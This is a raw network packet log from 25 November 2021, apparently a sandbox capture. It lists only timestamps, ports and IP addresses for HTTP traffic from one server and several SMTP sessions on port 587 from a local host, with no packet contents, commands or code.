Nov 25, 2021 18:21:29.400779963 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:29.400821924 CET	49168	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:29.544488907 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:29.544519901 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:29.544532061 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:29.544543982 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:29.544754982 CET	49168	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:29.544840097 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:29.544867039 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:29.544886112 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:29.544898033 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:29.544940948 CET	49168	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:29.545672894 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:29.545687914 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:29.545706034 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:29.545718908 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:29.545753956 CET	49168	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:29.546310902 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:29.546329975 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:29.546343088 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:29.546386957 CET	49168	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:29.546412945 CET	49168	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:29.546458006 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:29.547044039 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:29.547058105 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:29.547076941 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:29.547135115 CET	49168	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:29.547147989 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:29.547300100 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:29.547353983 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:29.547374964 CET	49168	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:29.547455072 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:29.547467947 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:29.547522068 CET	49168	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:29.547619104 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:29.547636986 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:29.547648907 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:29.547697067 CET	49168	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:29.547718048 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:29.547841072 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:29.547858000 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:29.547882080 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:29.547895908 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:29.547955990 CET	49168	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:29.547971964 CET	49168	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:29.548038006 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:29.548052073 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:29.548094988 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:29.548108101 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:29.548119068 CET	49168	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:29.548158884 CET	49168	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:29.548208952 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:29.548222065 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:29.548253059 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:29.548283100 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:29.548295975 CET	49168	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:29.548348904 CET	49168	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:29.548393965 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:29.548408031 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:29.548487902 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:29.548508883 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:29.548599958 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:29.548614025 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:29.548629999 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:29.548641920 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:29.548691988 CET	49168	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:29.548729897 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:29.549073935 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:29.549159050 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:29.549173117 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:29.549173117 CET	49168	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:29.549242973 CET	49168	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:29.549248934 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:29.549427986 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:29.549444914 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:29.549458027 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:29.549499035 CET	49168	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:29.549508095 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:29.549629927 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:29.549645901 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:29.549685955 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:29.549700022 CET	49168	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:29.549721956 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:29.549765110 CET	49168	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:29.549851894 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:29.549865007 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:29.549882889 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:29.549937963 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:29.549952984 CET	49168	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:29.550030947 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:29.550074100 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:29.550127029 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:29.550141096 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:29.550153017 CET	49168	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:29.550196886 CET	49168	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:29.550232887 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:29.550273895 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:29.550291061 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:29.550335884 CET	49168	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:29.550338984 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:29.550398111 CET	49168	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:29.550446033 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:29.550509930 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:29.550523996 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:29.550549984 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:29.550576925 CET	49168	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:29.550663948 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:29.550685883 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:29.550714970 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:29.550793886 CET	49168	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:29.550797939 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:29.550849915 CET	49168	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:29.550873041 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:29.550910950 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:29.550929070 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:29.550951004 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:29.550970078 CET	49168	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:29.551014900 CET	49168	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:29.551038980 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:29.551153898 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:29.551175117 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:29.551198006 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:29.551232100 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:29.551255941 CET	49168	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:29.551291943 CET	49168	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:29.551312923 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:29.551342964 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:29.551359892 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:29.551381111 CET	49168	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:29.551400900 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:29.551414013 CET	49168	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:29.551414967 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:29.551462889 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:29.551481009 CET	49168	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:29.551527977 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:29.551597118 CET	49168	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:29.551613092 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:29.698461056 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:29.698482990 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:29.698508978 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:29.698565006 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:29.698868990 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:29.698930025 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:29.698950052 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:29.699029922 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:29.699160099 CET	49168	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:29.699258089 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:29.699299097 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:29.699364901 CET	49168	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:29.699377060 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:29.699455976 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:29.699527025 CET	49168	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:29.699686050 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:29.699700117 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:29.699764967 CET	49168	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:29.699821949 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:29.699835062 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:29.699915886 CET	49168	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:29.700143099 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:29.700192928 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:29.700274944 CET	49168	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:29.700294018 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:29.700308084 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:29.700366020 CET	49168	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:29.700419903 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:29.700510025 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:29.700628996 CET	49168	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:29.700633049 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:29.700721979 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:29.700815916 CET	49168	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:29.700906992 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:29.700926065 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:29.700983047 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:29.701006889 CET	49168	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:29.701092005 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:29.701169968 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:29.701240063 CET	49168	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:29.701251030 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:29.701282978 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:29.701371908 CET	49168	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:29.701411963 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:29.701500893 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:29.701582909 CET	49168	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:29.701981068 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:29.701992989 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:29.702092886 CET	49168	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:31.004555941 CET	49168	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:56.953448057 CET	587	49173	208.91.199.224	192.168.2.22
Nov 25, 2021 18:21:56.953476906 CET	587	49173	208.91.199.224	192.168.2.22
Nov 25, 2021 18:21:56.953794956 CET	49173	587	192.168.2.22	208.91.199.224
Nov 25, 2021 18:21:56.953819990 CET	49173	587	192.168.2.22	208.91.199.224
Nov 25, 2021 18:21:59.507791996 CET	587	49174	208.91.198.143	192.168.2.22
Nov 25, 2021 18:21:59.507894039 CET	587	49174	208.91.198.143	192.168.2.22
Nov 25, 2021 18:21:59.508100033 CET	49174	587	192.168.2.22	208.91.198.143
Nov 25, 2021 18:21:59.508124113 CET	49174	587	192.168.2.22	208.91.198.143
Nov 25, 2021 18:22:16.441137075 CET	49169	587	192.168.2.22	208.91.198.143
Nov 25, 2021 18:22:16.592221975 CET	587	49169	208.91.198.143	192.168.2.22
Nov 25, 2021 18:22:16.592283964 CET	49169	587	192.168.2.22	208.91.198.143
Nov 25, 2021 18:22:16.768467903 CET	587	49169	208.91.198.143	192.168.2.22
Nov 25, 2021 18:22:16.769277096 CET	49169	587	192.168.2.22	208.91.198.143
Nov 25, 2021 18:22:16.919383049 CET	587	49169	208.91.198.143	192.168.2.22
Nov 25, 2021 18:22:16.919429064 CET	587	49169	208.91.198.143	192.168.2.22
Nov 25, 2021 18:22:16.929383993 CET	49169	587	192.168.2.22	208.91.198.143
Nov 25, 2021 18:22:17.080898046 CET	587	49169	208.91.198.143	192.168.2.22
Nov 25, 2021 18:22:17.087239027 CET	49169	587	192.168.2.22	208.91.198.143
Nov 25, 2021 18:22:17.239337921 CET	587	49169	208.91.198.143	192.168.2.22
Nov 25, 2021 18:22:17.241938114 CET	49169	587	192.168.2.22	208.91.198.143
Nov 25, 2021 18:22:17.394002914 CET	587	49169	208.91.198.143	192.168.2.22
Nov 25, 2021 18:22:17.396831989 CET	49169	587	192.168.2.22	208.91.198.143
Nov 25, 2021 18:22:17.563546896 CET	587	49169	208.91.198.143	192.168.2.22
Nov 25, 2021 18:22:17.565687895 CET	49169	587	192.168.2.22	208.91.198.143
Nov 25, 2021 18:22:17.716183901 CET	587	49169	208.91.198.143	192.168.2.22
Nov 25, 2021 18:22:17.724419117 CET	49169	587	192.168.2.22	208.91.198.143
Nov 25, 2021 18:22:17.725078106 CET	49169	587	192.168.2.22	208.91.198.143
Nov 25, 2021 18:22:17.725385904 CET	49169	587	192.168.2.22	208.91.198.143
Nov 25, 2021 18:22:17.726388931 CET	49169	587	192.168.2.22	208.91.198.143
Nov 25, 2021 18:22:17.732167006 CET	49169	587	192.168.2.22	208.91.198.143
Nov 25, 2021 18:22:17.875149965 CET	587	49169	208.91.198.143	192.168.2.22
Nov 25, 2021 18:22:17.875324011 CET	49169	587	192.168.2.22	208.91.198.143
Nov 25, 2021 18:22:17.876305103 CET	587	49169	208.91.198.143	192.168.2.22
Nov 25, 2021 18:22:17.921508074 CET	587	49169	208.91.198.143	192.168.2.22
Nov 25, 2021 18:22:17.921572924 CET	49169	587	192.168.2.22	208.91.198.143
Nov 25, 2021 18:22:18.025409937 CET	587	49169	208.91.198.143	192.168.2.22
Nov 25, 2021 18:22:18.025589943 CET	49169	587	192.168.2.22	208.91.198.143
Nov 25, 2021 18:22:18.071630955 CET	587	49169	208.91.198.143	192.168.2.22
Nov 25, 2021 18:22:18.071851969 CET	49169	587	192.168.2.22	208.91.198.143
Nov 25, 2021 18:22:18.175609112 CET	587	49169	208.91.198.143	192.168.2.22
Nov 25, 2021 18:22:18.175709963 CET	49169	587	192.168.2.22	208.91.198.143
Nov 25, 2021 18:22:18.175754070 CET	587	49169	208.91.198.143	192.168.2.22
Nov 25, 2021 18:22:18.175821066 CET	49169	587	192.168.2.22	208.91.198.143
Nov 25, 2021 18:22:18.222049952 CET	587	49169	208.91.198.143	192.168.2.22
Nov 25, 2021 18:22:18.222081900 CET	587	49169	208.91.198.143	192.168.2.22
Nov 25, 2021 18:22:18.222122908 CET	49169	587	192.168.2.22	208.91.198.143
Nov 25, 2021 18:22:18.222158909 CET	49169	587	192.168.2.22	208.91.198.143
Nov 25, 2021 18:22:18.222166061 CET	49169	587	192.168.2.22	208.91.198.143
Nov 25, 2021 18:22:18.325869083 CET	587	49169	208.91.198.143	192.168.2.22
Nov 25, 2021 18:22:18.325908899 CET	587	49169	208.91.198.143	192.168.2.22
Nov 25, 2021 18:22:18.325916052 CET	587	49169	208.91.198.143	192.168.2.22
Nov 25, 2021 18:22:18.325922966 CET	587	49169	208.91.198.143	192.168.2.22
Nov 25, 2021 18:22:18.326133013 CET	49169	587	192.168.2.22	208.91.198.143
Nov 25, 2021 18:22:18.372303963 CET	587	49169	208.91.198.143	192.168.2.22
Nov 25, 2021 18:22:18.372330904 CET	587	49169	208.91.198.143	192.168.2.22
Nov 25, 2021 18:22:18.372344971 CET	587	49169	208.91.198.143	192.168.2.22
Nov 25, 2021 18:22:18.372406006 CET	587	49169	208.91.198.143	192.168.2.22
Nov 25, 2021 18:22:18.372476101 CET	587	49169	208.91.198.143	192.168.2.22
Nov 25, 2021 18:22:18.372503996 CET	49169	587	192.168.2.22	208.91.198.143
Nov 25, 2021 18:22:18.372565985 CET	49169	587	192.168.2.22	208.91.198.143
Nov 25, 2021 18:22:18.372581005 CET	49169	587	192.168.2.22	208.91.198.143
Nov 25, 2021 18:22:18.476150036 CET	587	49169	208.91.198.143	192.168.2.22
Nov 25, 2021 18:22:18.476178885 CET	587	49169	208.91.198.143	192.168.2.22
Nov 25, 2021 18:22:18.476198912 CET	587	49169	208.91.198.143	192.168.2.22
Nov 25, 2021 18:22:18.476239920 CET	49169	587	192.168.2.22	208.91.198.143
Nov 25, 2021 18:22:18.476249933 CET	587	49169	208.91.198.143	192.168.2.22
Nov 25, 2021 18:22:18.476274967 CET	49169	587	192.168.2.22	208.91.198.143
Nov 25, 2021 18:22:18.522525072 CET	587	49169	208.91.198.143	192.168.2.22
Nov 25, 2021 18:22:18.522614956 CET	587	49169	208.91.198.143	192.168.2.22
Nov 25, 2021 18:22:18.522788048 CET	587	49169	208.91.198.143	192.168.2.22
Nov 25, 2021 18:22:18.522820950 CET	587	49169	208.91.198.143	192.168.2.22
Nov 25, 2021 18:22:18.626266956 CET	587	49169	208.91.198.143	192.168.2.22
Nov 25, 2021 18:22:18.626303911 CET	587	49169	208.91.198.143	192.168.2.22
Nov 25, 2021 18:22:18.626445055 CET	587	49169	208.91.198.143	192.168.2.22
Nov 25, 2021 18:22:18.775433064 CET	587	49169	208.91.198.143	192.168.2.22
Nov 25, 2021 18:22:18.775504112 CET	49169	587	192.168.2.22	208.91.198.143
Nov 25, 2021 18:22:18.775582075 CET	587	49169	208.91.198.143	192.168.2.22
Nov 25, 2021 18:22:18.775629997 CET	49169	587	192.168.2.22	208.91.198.143
Nov 25, 2021 18:22:26.095216036 CET	80	49167	173.232.204.89	192.168.2.22
Nov 25, 2021 18:22:26.095398903 CET	49167	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:22:26.367067099 CET	49170	587	192.168.2.22	208.91.198.143
Nov 25, 2021 18:22:26.519162893 CET	587	49170	208.91.198.143	192.168.2.22
Nov 25, 2021 18:22:26.520387888 CET	49170	587	192.168.2.22	208.91.198.143
Nov 25, 2021 18:22:26.675386906 CET	587	49170	208.91.198.143	192.168.2.22
Nov 25, 2021 18:22:26.678370953 CET	49170	587	192.168.2.22	208.91.198.143
Nov 25, 2021 18:22:26.830554962 CET	587	49170	208.91.198.143	192.168.2.22
Nov 25, 2021 18:22:26.830585957 CET	587	49170	208.91.198.143	192.168.2.22
Nov 25, 2021 18:22:26.830857038 CET	49170	587	192.168.2.22	208.91.198.143
Nov 25, 2021 18:22:26.983576059 CET	587	49170	208.91.198.143	192.168.2.22
Nov 25, 2021 18:22:26.984498024 CET	49170	587	192.168.2.22	208.91.198.143
Nov 25, 2021 18:22:27.138392925 CET	587	49170	208.91.198.143	192.168.2.22
Nov 25, 2021 18:22:27.141244888 CET	49170	587	192.168.2.22	208.91.198.143
Nov 25, 2021 18:22:27.294445038 CET	587	49170	208.91.198.143	192.168.2.22
Nov 25, 2021 18:22:27.324578047 CET	49170	587	192.168.2.22	208.91.198.143
Nov 25, 2021 18:22:27.495106936 CET	587	49170	208.91.198.143	192.168.2.22
Nov 25, 2021 18:22:27.495655060 CET	49170	587	192.168.2.22	208.91.198.143
Nov 25, 2021 18:22:27.647941113 CET	587	49170	208.91.198.143	192.168.2.22
Nov 25, 2021 18:22:27.655500889 CET	49170	587	192.168.2.22	208.91.198.143
Nov 25, 2021 18:22:27.655558109 CET	49170	587	192.168.2.22	208.91.198.143
Nov 25, 2021 18:22:27.655616999 CET	49170	587	192.168.2.22	208.91.198.143
Nov 25, 2021 18:22:27.655705929 CET	49170	587	192.168.2.22	208.91.198.143
Nov 25, 2021 18:22:27.657869101 CET	49170	587	192.168.2.22	208.91.198.143
Nov 25, 2021 18:22:27.807619095 CET	587	49170	208.91.198.143	192.168.2.22
Nov 25, 2021 18:22:27.807897091 CET	49170	587	192.168.2.22	208.91.198.143
Nov 25, 2021 18:22:27.809931040 CET	587	49170	208.91.198.143	192.168.2.22
Nov 25, 2021 18:22:27.810297012 CET	49170	587	192.168.2.22	208.91.198.143
Nov 25, 2021 18:22:27.962409973 CET	587	49170	208.91.198.143	192.168.2.22
Nov 25, 2021 18:22:27.962630033 CET	49170	587	192.168.2.22	208.91.198.143
Nov 25, 2021 18:22:28.003264904 CET	587	49170	208.91.198.143	192.168.2.22
Nov 25, 2021 18:22:28.003468037 CET	49170	587	192.168.2.22	208.91.198.143
Nov 25, 2021 18:22:28.114903927 CET	587	49170	208.91.198.143	192.168.2.22
Nov 25, 2021 18:22:28.114945889 CET	587	49170	208.91.198.143	192.168.2.22
Nov 25, 2021 18:22:28.115046978 CET	49170	587	192.168.2.22	208.91.198.143
Nov 25, 2021 18:22:28.115128040 CET	49170	587	192.168.2.22	208.91.198.143
Nov 25, 2021 18:22:28.155571938 CET	587	49170	208.91.198.143	192.168.2.22
Nov 25, 2021 18:22:28.155622005 CET	587	49170	208.91.198.143	192.168.2.22
Nov 25, 2021 18:22:28.155762911 CET	49170	587	192.168.2.22	208.91.198.143
Nov 25, 2021 18:22:28.267129898 CET	587	49170	208.91.198.143	192.168.2.22
Nov 25, 2021 18:22:28.267178059 CET	587	49170	208.91.198.143	192.168.2.22
Nov 25, 2021 18:22:28.267196894 CET	587	49170	208.91.198.143	192.168.2.22
Nov 25, 2021 18:22:28.267329931 CET	49170	587	192.168.2.22	208.91.198.143
Nov 25, 2021 18:22:28.267385006 CET	49170	587	192.168.2.22	208.91.198.143
Nov 25, 2021 18:22:28.267661095 CET	587	49170	208.91.198.143	192.168.2.22
Nov 25, 2021 18:22:28.267704010 CET	587	49170	208.91.198.143	192.168.2.22
Nov 25, 2021 18:22:28.267723083 CET	587	49170	208.91.198.143	192.168.2.22
Nov 25, 2021 18:22:28.267811060 CET	49170	587	192.168.2.22	208.91.198.143
Nov 25, 2021 18:22:28.267839909 CET	49170	587	192.168.2.22	208.91.198.143
Nov 25, 2021 18:22:28.307960033 CET	587	49170	208.91.198.143	192.168.2.22
Nov 25, 2021 18:22:28.308005095 CET	587	49170	208.91.198.143	192.168.2.22
Nov 25, 2021 18:22:28.308163881 CET	49170	587	192.168.2.22	208.91.198.143
Nov 25, 2021 18:22:28.419487000 CET	587	49170	208.91.198.143	192.168.2.22
Nov 25, 2021 18:22:28.419513941 CET	587	49170	208.91.198.143	192.168.2.22
Nov 25, 2021 18:22:28.419526100 CET	587	49170	208.91.198.143	192.168.2.22
Nov 25, 2021 18:22:28.419596910 CET	587	49170	208.91.198.143	192.168.2.22
Nov 25, 2021 18:22:28.419612885 CET	587	49170	208.91.198.143	192.168.2.22
Nov 25, 2021 18:22:28.419636965 CET	49170	587	192.168.2.22	208.91.198.143
Nov 25, 2021 18:22:28.419698954 CET	49170	587	192.168.2.22	208.91.198.143
Nov 25, 2021 18:22:28.419754982 CET	587	49170	208.91.198.143	192.168.2.22
Nov 25, 2021 18:22:28.419914961 CET	587	49170	208.91.198.143	192.168.2.22
Nov 25, 2021 18:22:28.419934034 CET	587	49170	208.91.198.143	192.168.2.22
Nov 25, 2021 18:22:28.420111895 CET	587	49170	208.91.198.143	192.168.2.22
Nov 25, 2021 18:22:28.460382938 CET	587	49170	208.91.198.143	192.168.2.22
Nov 25, 2021 18:22:28.460416079 CET	587	49170	208.91.198.143	192.168.2.22
Nov 25, 2021 18:22:28.460659027 CET	587	49170	208.91.198.143	192.168.2.22
Nov 25, 2021 18:22:28.571825981 CET	587	49170	208.91.198.143	192.168.2.22
Nov 25, 2021 18:22:28.571930885 CET	587	49170	208.91.198.143	192.168.2.22
Nov 25, 2021 18:22:28.571954012 CET	587	49170	208.91.198.143	192.168.2.22
Nov 25, 2021 18:22:28.720513105 CET	587	49170	208.91.198.143	192.168.2.22
Nov 25, 2021 18:22:29.005311012 CET	49170	587	192.168.2.22	208.91.198.143
Nov 25, 2021 18:22:30.119323015 CET	49167	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:22:38.691118956 CET	49170	587	192.168.2.22	208.91.198.143
Nov 25, 2021 18:22:38.843348026 CET	587	49170	208.91.198.143	192.168.2.22
Nov 25, 2021 18:22:38.843374014 CET	587	49170	208.91.198.143	192.168.2.22
